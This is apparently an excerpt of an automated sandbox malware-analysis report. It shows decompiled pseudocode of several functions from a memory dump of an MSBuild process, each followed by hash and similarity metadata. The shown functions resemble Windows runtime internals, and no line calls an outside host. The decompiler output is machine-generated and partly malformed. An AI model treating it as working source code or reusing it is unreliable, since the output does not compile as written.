                                            					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                            					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                            					_v104 = _t159;
                                            					_v76 = _t159;
                                            					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                            					_v100 = _t160;
                                            					_v72 = _t160;
                                            					L19:
                                            					_v80 = _t208;
                                            					_v84 = _t247;
                                            					L8:
                                            					_t214 = 0;
                                            					if( *(_t237 + 0x74) > 0) {
                                            						_t82 = _t237 + 0x84; // 0x124
                                            						_t161 = _t82;
                                            						_v92 = _t161;
                                            						while( *_t161 >> 0x1f != 0) {
                                            							_t200 = _v92;
                                            							if( *_t200 == 0x80000000) {
                                            								break;
                                            							}
                                            							_t214 = _t214 + 1;
                                            							_t161 = _t200 + 0x10;
                                            							_v92 = _t161;
                                            							if(_t214 <  *(_t237 + 0x74)) {
                                            								continue;
                                            							}
                                            							goto L9;
                                            						}
                                            						_v88 = _t214 << 4;
                                            						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                            						_t165 = 0;
                                            						asm("adc eax, [ecx+edx+0x7c]");
                                            						_v24 = _t165;
                                            						_v28 = _v40;
                                            						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                            						_t221 = _v40;
                                            						_v16 =  *_v92;
                                            						_v32 =  &_v28;
                                            						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                            							goto L9;
                                            						}
                                            						_t240 = _v48;
                                            						if( *_v92 != 0x80000000) {
                                            							goto L9;
                                            						}
                                            						 *((intOrPtr*)(_t221 + 8)) = 0;
                                            						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                            						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                            						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                            						_t226 = 0;
                                            						_t181 = _t251 + 0x66;
                                            						_v88 = 0;
                                            						_v92 = _t181;
                                            						do {
                                            							if( *((char*)(_t181 - 2)) == 0) {
                                            								goto L31;
                                            							}
                                            							_t226 = _v88;
                                            							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                            								_t181 = E0104D0F0(1, _t226 + 0x20, 0);
                                            								_t226 = _v40;
                                            								 *(_t226 + 8) = _t181;
                                            								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                            								L34:
                                            								if(_v44 == 0) {
                                            									goto L9;
                                            								}
                                            								_t210 = _v44;
                                            								_t127 = _t210 + 0x1c; // 0x1c
                                            								_t249 = _t127;
                                            								E01022280(_t181, _t127);
                                            								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                            								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                            								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                            								}
                                            								_t189 = L01024620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                            								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                            								if(_t189 != 0) {
                                            									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                            									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                            									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                            									 *_t232 = _t232 + 0x10;
                                            									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                            									E0104F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                            									_t256 = _t256 + 0xc;
                                            								}
                                            								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                            								E0101FFB0(_t210, _t249, _t249);
                                            								_t222 = _v76;
                                            								_t172 = _v80;
                                            								_t208 = _v84;
                                            								_t247 = _v88;
                                            								L10:
                                            								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                            								_v44 = _t238;
                                            								if(_t238 != 0) {
                                            									 *0x10fb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                            									_v44();
                                            								}
                                            								_pop(_t248);
                                            								_pop(_t252);
                                            								_pop(_t209);
                                            								return E0104B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                            							}
                                            							_t181 = _v92;
                                            							L31:
                                            							_t226 = _t226 + 1;
                                            							_t181 =  &(_t181[0x18]);
                                            							_v88 = _t226;
                                            							_v92 = _t181;
                                            						} while (_t226 < 4);
                                            						goto L34;
                                            					}
                                            					L9:
                                            					_t172 = _v104;
                                            					_t222 = _v100;
                                            					goto L10;
                                            				}
                                            				_t247 = _t246 | 0xffffffff;
                                            				_t208 = _t247;
                                            				_v84 = _t247;
                                            				_v80 = _t208;
                                            				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                            					_t233 = _v72;
                                            					_v105 = _v64;
                                            					_t202 = _v76;
                                            				} else {
                                            					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                            					_v105 = 1;
                                            					if(_v63 <= _t204) {
                                            						_v63 = _t204;
                                            					}
                                            					_t202 = _v76 |  *(_t251 + 0x40);
                                            					_t233 = _v72 |  *(_t251 + 0x44);
                                            					_t247 =  *(_t251 + 0x38);
                                            					_t208 =  *(_t251 + 0x3c);
                                            					_v76 = _t202;
                                            					_v72 = _t233;
                                            					_v84 = _t247;
                                            					_v80 = _t208;
                                            				}
                                            				_v104 = _t202;
                                            				_v100 = _t233;
                                            				if( *((char*)(_t251 + 0xc4)) != 0) {
                                            					_t237 = _v48;
                                            					_v105 = 1;
                                            					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                            						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                            						_t237 = _v48;
                                            					}
                                            					_t203 = _t202 |  *(_t251 + 0xb8);
                                            					_t234 = _t233 |  *(_t251 + 0xbc);
                                            					_t247 = _t247 &  *(_t251 + 0xb0);
                                            					_t208 = _t208 &  *(_t251 + 0xb4);
                                            					_v104 = _t203;
                                            					_v76 = _t203;
                                            					_v100 = _t234;
                                            					_v72 = _t234;
                                            					_v84 = _t247;
                                            					_v80 = _t208;
                                            				}
                                            				if(_v105 == 0) {
                                            					_v36 = _v36 & 0x00000000;
                                            					_t208 = 0;
                                            					_t247 = 0;
                                            					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                            					goto L19;
                                            				} else {
                                            					_v36 = 1;
                                            					goto L8;
                                            				}
                                            			}


                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c841c12b8bff28091158defad3c13ddadb81dcfe738a399838af032b0e00837
                                            • Instruction ID: 9cf405e026d9d253ec4df3eed458980712a05c8957a795a7644cf834472104ee
                                            • Opcode Fuzzy Hash: 7c841c12b8bff28091158defad3c13ddadb81dcfe738a399838af032b0e00837
                                            • Instruction Fuzzy Hash: 66C112759087818FE354CF28C480A5AFBE1BF89304F1449AEF9DA8B352D771E845CB56
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 74%
                                            			E010303E2(signed int __ecx, signed int __edx) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				signed int _v36;
                                            				intOrPtr _v40;
                                            				signed int _v44;
                                            				signed int _v48;
                                            				char _v52;
                                            				char _v56;
                                            				char _v64;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t56;
                                            				signed int _t58;
                                            				char* _t64;
                                            				intOrPtr _t65;
                                            				signed int _t74;
                                            				signed int _t79;
                                            				char* _t83;
                                            				intOrPtr _t84;
                                            				signed int _t93;
                                            				signed int _t94;
                                            				signed char* _t95;
                                            				signed int _t99;
                                            				signed int _t100;
                                            				signed char* _t101;
                                            				signed int _t105;
                                            				signed int _t119;
                                            				signed int _t120;
                                            				void* _t122;
                                            				signed int _t123;
                                            				signed int _t127;
                                            
                                            				_v8 =  *0x10fd360 ^ _t127;
                                            				_t119 = __ecx;
                                            				_t105 = __edx;
                                            				_t118 = 0;
                                            				_v20 = __edx;
                                            				_t120 =  *(__ecx + 0x20);
                                            				if(E01030548(__ecx, 0) != 0) {
                                            					_t56 = 0xc000022d;
                                            					L23:
                                            					return E0104B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                            				} else {
                                            					_v12 = _v12 | 0xffffffff;
                                            					_t58 = _t120 + 0x24;
                                            					_t109 =  *(_t120 + 0x18);
                                            					_t118 = _t58;
                                            					_v16 = _t58;
                                            					E0101B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                            					_v52 = 0x18;
                                            					_v48 = 0;
                                            					0x840 = 0x40;
                                            					if( *0x10f7c1c != 0) {
                                            					}
                                            					_v40 = 0x840;
                                            					_v44 = _t105;
                                            					_v36 = 0;
                                            					_v32 = 0;
                                            					if(E01027D50() != 0) {
                                            						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            					} else {
                                            						_t64 = 0x7ffe0384;
                                            					}
                                            					if( *_t64 != 0) {
                                            						_t65 =  *[fs:0x30];
                                            						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                            						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                            							_t100 = E01027D50();
                                            							__eflags = _t100;
                                            							if(_t100 == 0) {
                                            								_t101 = 0x7ffe0385;
                                            							} else {
                                            								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            							}
                                            							__eflags =  *_t101 & 0x00000020;
                                            							if(( *_t101 & 0x00000020) != 0) {
                                            								_t118 = _t118 | 0xffffffff;
                                            								_t109 = 0x1485;
                                            								E01087016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                            							}
                                            						}
                                            					}
                                            					_t105 = 0;
                                            					while(1) {
                                            						_push(0x60);
                                            						_push(5);
                                            						_push( &_v64);
                                            						_push( &_v52);
                                            						_push(0x100021);
                                            						_push( &_v12);
                                            						_t122 = E01049830();
                                            						if(_t122 >= 0) {
                                            							break;
                                            						}
                                            						__eflags = _t122 - 0xc0000034;
                                            						if(_t122 == 0xc0000034) {
                                            							L38:
                                            							_t120 = 0xc0000135;
                                            							break;
                                            						}
                                            						__eflags = _t122 - 0xc000003a;
                                            						if(_t122 == 0xc000003a) {
                                            							goto L38;
                                            						}
                                            						__eflags = _t122 - 0xc0000022;
                                            						if(_t122 != 0xc0000022) {
                                            							break;
                                            						}
                                            						__eflags = _t105;
                                            						if(__eflags != 0) {
                                            							break;
                                            						}
                                            						_t109 = _t119;
                                            						_t99 = E010869A6(_t119, __eflags);
                                            						__eflags = _t99;
                                            						if(_t99 == 0) {
                                            							break;
                                            						}
                                            						_t105 = _t105 + 1;
                                            					}
                                            					if( !_t120 >= 0) {
                                            						L22:
                                            						_t56 = _t120;
                                            						goto L23;
                                            					}
                                            					if( *0x10f7c04 != 0) {
                                            						_t118 = _v12;
                                            						_t120 = E0108A7AC(_t119, _t118, _t109);
                                            						__eflags = _t120;
                                            						if(_t120 >= 0) {
                                            							goto L10;
                                            						}
                                            						__eflags =  *0x10f7bd8;
                                            						if( *0x10f7bd8 != 0) {
                                            							L20:
                                            							if(_v12 != 0xffffffff) {
                                            								_push(_v12);
                                            								E010495D0();
                                            							}
                                            							goto L22;
                                            						}
                                            					}
                                            					L10:
                                            					_push(_v12);
                                            					_t105 = _t119 + 0xc;
                                            					_push(0x1000000);
                                            					_push(0x10);
                                            					_push(0);
                                            					_push(0);
                                            					_push(0xf);
                                            					_push(_t105);
                                            					_t120 = E010499A0();
                                            					if(_t120 < 0) {
                                            						__eflags = _t120 - 0xc000047e;
                                            						if(_t120 == 0xc000047e) {
                                            							L51:
                                            							_t74 = E01083540(_t120);
                                            							_t119 = _v16;
                                            							_t120 = _t74;
                                            							L52:
                                            							_t118 = 0x1485;
                                            							E0100B1E1(_t120, 0x1485, 0, _t119);
                                            							goto L20;
                                            						}
                                            						__eflags = _t120 - 0xc000047f;
                                            						if(_t120 == 0xc000047f) {
                                            							goto L51;
                                            						}
                                            						__eflags = _t120 - 0xc0000462;
                                            						if(_t120 == 0xc0000462) {
                                            							goto L51;
                                            						}
                                            						_t119 = _v16;
                                            						__eflags = _t120 - 0xc0000017;
                                            						if(_t120 != 0xc0000017) {
                                            							__eflags = _t120 - 0xc000009a;
                                            							if(_t120 != 0xc000009a) {
                                            								__eflags = _t120 - 0xc000012d;
                                            								if(_t120 != 0xc000012d) {
                                            									_v28 = _t119;
                                            									_push( &_v56);
                                            									_push(1);
                                            									_v24 = _t120;
                                            									_push( &_v28);
                                            									_push(1);
                                            									_push(2);
                                            									_push(0xc000007b);
                                            									_t79 = E0104AAF0();
                                            									__eflags = _t79;
                                            									if(_t79 >= 0) {
                                            										__eflags =  *0x10f8474 - 3;
                                            										if( *0x10f8474 != 3) {
                                            											 *0x10f79dc =  *0x10f79dc + 1;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						goto L52;
                                            					}
                                            					if(E01027D50() != 0) {
                                            						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            					} else {
                                            						_t83 = 0x7ffe0384;
                                            					}
                                            					if( *_t83 != 0) {
                                            						_t84 =  *[fs:0x30];
                                            						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                            						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                            							_t94 = E01027D50();
                                            							__eflags = _t94;
                                            							if(_t94 == 0) {
                                            								_t95 = 0x7ffe0385;
                                            							} else {
                                            								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            							}
                                            							__eflags =  *_t95 & 0x00000020;
                                            							if(( *_t95 & 0x00000020) != 0) {
                                            								E01087016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                            							}
                                            						}
                                            					}
                                            					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                            						if( *0x10f8708 != 0) {
                                            							_t118 =  *0x7ffe0330;
                                            							_t123 =  *0x10f7b00; // 0x0
                                            							asm("ror esi, cl");
                                            							 *0x10fb1e0(_v12, _v20, 0x20);
                                            							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                            							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                            							asm("sbb esi, esi");
                                            							_t120 =  ~_t50 & _t93;
                                            						} else {
                                            							_t120 = 0;
                                            						}
                                            					}
                                            					if( !_t120 >= 0) {
                                            						L19:
                                            						_push( *_t105);
                                            						E010495D0();
                                            						 *_t105 =  *_t105 & 0x00000000;
                                            						goto L20;
                                            					}
                                            					_t120 = E01017F65(_t119);
                                            					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                            						__eflags = _t120;
                                            						if(_t120 < 0) {
                                            							goto L19;
                                            						}
                                            						 *(_t119 + 0x64) = _v12;
                                            						goto L22;
                                            					}
                                            					goto L19;
                                            				}
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1402607c69107f587b0411d792618448c0f089428e0721f77f49676184cb5df
                                            • Instruction ID: ab006fcd45db4df7503f77d9e1ca0d665bfa5a3a531b0233e6a51a1fc8ad6d40
                                            • Opcode Fuzzy Hash: e1402607c69107f587b0411d792618448c0f089428e0721f77f49676184cb5df
                                            • Instruction Fuzzy Hash: F3915D71E012199FEB32AB6CC844BAE7BE8EB41724F0502A5FAD0E72D5DB749D00C795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 67%
                                            			E0100C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                            				signed int _v8;
                                            				char _v1036;
                                            				signed int _v1040;
                                            				char _v1048;
                                            				signed int _v1052;
                                            				signed char _v1056;
                                            				void* _v1058;
                                            				char _v1060;
                                            				signed int _v1064;
                                            				void* _v1068;
                                            				intOrPtr _v1072;
                                            				void* _v1084;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr _t70;
                                            				intOrPtr _t72;
                                            				signed int _t74;
                                            				intOrPtr _t77;
                                            				signed int _t78;
                                            				signed int _t81;
                                            				void* _t101;
                                            				signed int _t102;
                                            				signed int _t107;
                                            				signed int _t109;
                                            				signed int _t110;
                                            				signed char _t111;
                                            				signed int _t112;
                                            				signed int _t113;
                                            				signed int _t114;
                                            				intOrPtr _t116;
                                            				void* _t117;
                                            				char _t118;
                                            				void* _t120;
                                            				char _t121;
                                            				signed int _t122;
                                            				signed int _t123;
                                            				signed int _t125;
                                            
                                            				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                            				_v8 =  *0x10fd360 ^ _t125;
                                            				_t116 = _a4;
                                            				_v1056 = _a16;
                                            				_v1040 = _a24;
                                            				if(E01016D30( &_v1048, _a8) < 0) {
                                            					L4:
                                            					_pop(_t117);
                                            					_pop(_t120);
                                            					_pop(_t101);
                                            					return E0104B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                            				}
                                            				_t70 = _a20;
                                            				if(_t70 >= 0x3f4) {
                                            					_t121 = _t70 + 0xc;
                                            					L19:
                                            					_t107 =  *( *[fs:0x30] + 0x18);
                                            					__eflags = _t107;
                                            					if(_t107 == 0) {
                                            						L60:
                                            						_t68 = 0xc0000017;
                                            						goto L4;
                                            					}
                                            					_t72 =  *0x10f7b9c; // 0x0
                                            					_t74 = L01024620(_t107, _t107, _t72 + 0x180000, _t121);
                                            					_v1064 = _t74;
                                            					__eflags = _t74;
                                            					if(_t74 == 0) {
                                            						goto L60;
                                            					}
                                            					_t102 = _t74;
                                            					_push( &_v1060);
                                            					_push(_t121);
                                            					_push(_t74);
                                            					_push(2);
                                            					_push( &_v1048);
                                            					_push(_t116);
                                            					_t122 = E01049650();
                                            					__eflags = _t122;
                                            					if(_t122 >= 0) {
                                            						L7:
                                            						_t114 = _a12;
                                            						__eflags = _t114;
                                            						if(_t114 != 0) {
                                            							_t77 = _a20;
                                            							L26:
                                            							_t109 =  *(_t102 + 4);
                                            							__eflags = _t109 - 3;
                                            							if(_t109 == 3) {
                                            								L55:
                                            								__eflags = _t114 - _t109;
                                            								if(_t114 != _t109) {
                                            									L59:
                                            									_t122 = 0xc0000024;
                                            									L15:
                                            									_t78 = _v1052;
                                            									__eflags = _t78;
                                            									if(_t78 != 0) {
                                            										L010277F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                            									}
                                            									_t68 = _t122;
                                            									goto L4;
                                            								}
                                            								_t110 = _v1056;
                                            								_t118 =  *((intOrPtr*)(_t102 + 8));
                                            								_v1060 = _t118;
                                            								__eflags = _t110;
                                            								if(_t110 == 0) {
                                            									L10:
                                            									_t122 = 0x80000005;
                                            									L11:
                                            									_t81 = _v1040;
                                            									__eflags = _t81;
                                            									if(_t81 == 0) {
                                            										goto L15;
                                            									}
                                            									__eflags = _t122;
                                            									if(_t122 >= 0) {
                                            										L14:
                                            										 *_t81 = _t118;
                                            										goto L15;
                                            									}
                                            									__eflags = _t122 - 0x80000005;
                                            									if(_t122 != 0x80000005) {
                                            										goto L15;
                                            									}
                                            									goto L14;
                                            								}
                                            								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                            								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                            									goto L10;
                                            								}
                                            								_push( *((intOrPtr*)(_t102 + 8)));
                                            								_t59 = _t102 + 0xc; // 0xc
                                            								_push(_t110);
                                            								L54:
                                            								E0104F3E0();
                                            								_t125 = _t125 + 0xc;
                                            								goto L11;
                                            							}
                                            							__eflags = _t109 - 7;
                                            							if(_t109 == 7) {
                                            								goto L55;
                                            							}
                                            							_t118 = 4;
                                            							__eflags = _t109 - _t118;
                                            							if(_t109 != _t118) {
                                            								__eflags = _t109 - 0xb;
                                            								if(_t109 != 0xb) {
                                            									__eflags = _t109 - 1;
                                            									if(_t109 == 1) {
                                            										__eflags = _t114 - _t118;
                                            										if(_t114 != _t118) {
                                            											_t118 =  *((intOrPtr*)(_t102 + 8));
                                            											_v1060 = _t118;
                                            											__eflags = _t118 - _t77;
                                            											if(_t118 > _t77) {
                                            												goto L10;
                                            											}
                                            											_push(_t118);
                                            											_t56 = _t102 + 0xc; // 0xc
                                            											_push(_v1056);
                                            											goto L54;
                                            										}
                                            										__eflags = _t77 - _t118;
                                            										if(_t77 != _t118) {
                                            											L34:
                                            											_t122 = 0xc0000004;
                                            											goto L15;
                                            										}
                                            										_t111 = _v1056;
                                            										__eflags = _t111 & 0x00000003;
                                            										if((_t111 & 0x00000003) == 0) {
                                            											_v1060 = _t118;
                                            											__eflags = _t111;
                                            											if(__eflags == 0) {
                                            												goto L10;
                                            											}
                                            											_t42 = _t102 + 0xc; // 0xc
                                            											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                            											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                            											_push(_t111);
                                            											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                            											_push(0);
                                            											_push( &_v1048);
                                            											_t122 = E010413C0(_t102, _t118, _t122, __eflags);
                                            											L44:
                                            											_t118 = _v1072;
                                            											goto L11;
                                            										}
                                            										_t122 = 0x80000002;
                                            										goto L15;
                                            									}
                                            									_t122 = 0xc0000024;
                                            									goto L44;
                                            								}
                                            								__eflags = _t114 - _t109;
                                            								if(_t114 != _t109) {
                                            									goto L59;
                                            								}
                                            								_t118 = 8;
                                            								__eflags = _t77 - _t118;
                                            								if(_t77 != _t118) {
                                            									goto L34;
                                            								}
                                            								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                            								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                            									goto L34;
                                            								}
                                            								_t112 = _v1056;
                                            								_v1060 = _t118;
                                            								__eflags = _t112;
                                            								if(_t112 == 0) {
                                            									goto L10;
                                            								}
                                            								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                            								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                            								goto L11;
                                            							}
                                            							__eflags = _t114 - _t118;
                                            							if(_t114 != _t118) {
                                            								goto L59;
                                            							}
                                            							__eflags = _t77 - _t118;
                                            							if(_t77 != _t118) {
                                            								goto L34;
                                            							}
                                            							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                            							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                            								goto L34;
                                            							}
                                            							_t113 = _v1056;
                                            							_v1060 = _t118;
                                            							__eflags = _t113;
                                            							if(_t113 == 0) {
                                            								goto L10;
                                            							}
                                            							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                            							goto L11;
                                            						}
                                            						_t118 =  *((intOrPtr*)(_t102 + 8));
                                            						__eflags = _t118 - _a20;
                                            						if(_t118 <= _a20) {
                                            							_t114 =  *(_t102 + 4);
                                            							_t77 = _t118;
                                            							goto L26;
                                            						}
                                            						_v1060 = _t118;
                                            						goto L10;
                                            					}
                                            					__eflags = _t122 - 0x80000005;
                                            					if(_t122 != 0x80000005) {
                                            						goto L15;
                                            					}
                                            					L010277F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                            					L18:
                                            					_t121 = _v1060;
                                            					goto L19;
                                            				}
                                            				_push( &_v1060);
                                            				_push(0x400);
                                            				_t102 =  &_v1036;
                                            				_push(_t102);
                                            				_push(2);
                                            				_push( &_v1048);
                                            				_push(_t116);
                                            				_t122 = E01049650();
                                            				if(_t122 >= 0) {
                                            					__eflags = 0;
                                            					_v1052 = 0;
                                            					goto L7;
                                            				}
                                            				if(_t122 == 0x80000005) {
                                            					goto L18;
                                            				}
                                            				goto L4;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3dcf97584162e35a1396aec79df0cf6b73c8f5727bc5318f46180dfee2f0e538
                                            • Instruction ID: 17922f2cbd6226155821b7ce1293bc990d8b9487864cc461a626a25f017d920d
                                            • Opcode Fuzzy Hash: 3dcf97584162e35a1396aec79df0cf6b73c8f5727bc5318f46180dfee2f0e538
                                            • Instruction Fuzzy Hash: 2A81C671A042019BEB22DE58C884B7F77E4FB84294F14496DEEC58B241D330ED40CB96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 39%
                                            			E0109B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                            				char _v8;
                                            				signed int _v12;
                                            				signed int _t80;
                                            				signed int _t83;
                                            				intOrPtr _t89;
                                            				signed int _t92;
                                            				signed char _t106;
                                            				signed int* _t107;
                                            				intOrPtr _t108;
                                            				intOrPtr _t109;
                                            				signed int _t114;
                                            				void* _t115;
                                            				void* _t117;
                                            				void* _t119;
                                            				void* _t122;
                                            				signed int _t123;
                                            				signed int* _t124;
                                            
                                            				_t106 = _a12;
                                            				if((_t106 & 0xfffffffc) != 0) {
                                            					return 0xc000000d;
                                            				}
                                            				if((_t106 & 0x00000002) != 0) {
                                            					_t106 = _t106 | 0x00000001;
                                            				}
                                            				_t109 =  *0x10f7b9c; // 0x0
                                            				_t124 = L01024620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                            				if(_t124 != 0) {
                                            					 *_t124 =  *_t124 & 0x00000000;
                                            					_t124[1] = _t124[1] & 0x00000000;
                                            					_t124[4] = _t124[4] & 0x00000000;
                                            					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                            						L13:
                                            						_push(_t124);
                                            						if((_t106 & 0x00000002) != 0) {
                                            							_push(0x200);
                                            							_push(0x28);
                                            							_push(0xffffffff);
                                            							_t122 = E01049800();
                                            							if(_t122 < 0) {
                                            								L33:
                                            								if((_t124[4] & 0x00000001) != 0) {
                                            									_push(4);
                                            									_t64 =  &(_t124[1]); // 0x4
                                            									_t107 = _t64;
                                            									_push(_t107);
                                            									_push(5);
                                            									_push(0xfffffffe);
                                            									E010495B0();
                                            									if( *_t107 != 0) {
                                            										_push( *_t107);
                                            										E010495D0();
                                            									}
                                            								}
                                            								_push(_t124);
                                            								_push(0);
                                            								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                            								L37:
                                            								L010277F0();
                                            								return _t122;
                                            							}
                                            							_t124[4] = _t124[4] | 0x00000002;
                                            							L18:
                                            							_t108 = _a8;
                                            							_t29 =  &(_t124[0x105]); // 0x414
                                            							_t80 = _t29;
                                            							_t30 =  &(_t124[5]); // 0x14
                                            							_t124[3] = _t80;
                                            							_t123 = 0;
                                            							_t124[2] = _t30;
                                            							 *_t80 = _t108;
                                            							if(_t108 == 0) {
                                            								L21:
                                            								_t112 = 0x400;
                                            								_push( &_v8);
                                            								_v8 = 0x400;
                                            								_push(_t124[2]);
                                            								_push(0x400);
                                            								_push(_t124[3]);
                                            								_push(0);
                                            								_push( *_t124);
                                            								_t122 = E01049910();
                                            								if(_t122 != 0xc0000023) {
                                            									L26:
                                            									if(_t122 != 0x106) {
                                            										L40:
                                            										if(_t122 < 0) {
                                            											L29:
                                            											_t83 = _t124[2];
                                            											if(_t83 != 0) {
                                            												_t59 =  &(_t124[5]); // 0x14
                                            												if(_t83 != _t59) {
                                            													L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                            												}
                                            											}
                                            											_push( *_t124);
                                            											E010495D0();
                                            											goto L33;
                                            										}
                                            										 *_a16 = _t124;
                                            										return 0;
                                            									}
                                            									if(_t108 != 1) {
                                            										_t122 = 0;
                                            										goto L40;
                                            									}
                                            									_t122 = 0xc0000061;
                                            									goto L29;
                                            								} else {
                                            									goto L22;
                                            								}
                                            								while(1) {
                                            									L22:
                                            									_t89 =  *0x10f7b9c; // 0x0
                                            									_t92 = L01024620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                            									_t124[2] = _t92;
                                            									if(_t92 == 0) {
                                            										break;
                                            									}
                                            									_t112 =  &_v8;
                                            									_push( &_v8);
                                            									_push(_t92);
                                            									_push(_v8);
                                            									_push(_t124[3]);
                                            									_push(0);
                                            									_push( *_t124);
                                            									_t122 = E01049910();
                                            									if(_t122 != 0xc0000023) {
                                            										goto L26;
                                            									}
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                            								}
                                            								_t122 = 0xc0000017;
                                            								goto L26;
                                            							}
                                            							_t119 = 0;
                                            							do {
                                            								_t114 = _t124[3];
                                            								_t119 = _t119 + 0xc;
                                            								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                            								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                            								_t123 = _t123 + 1;
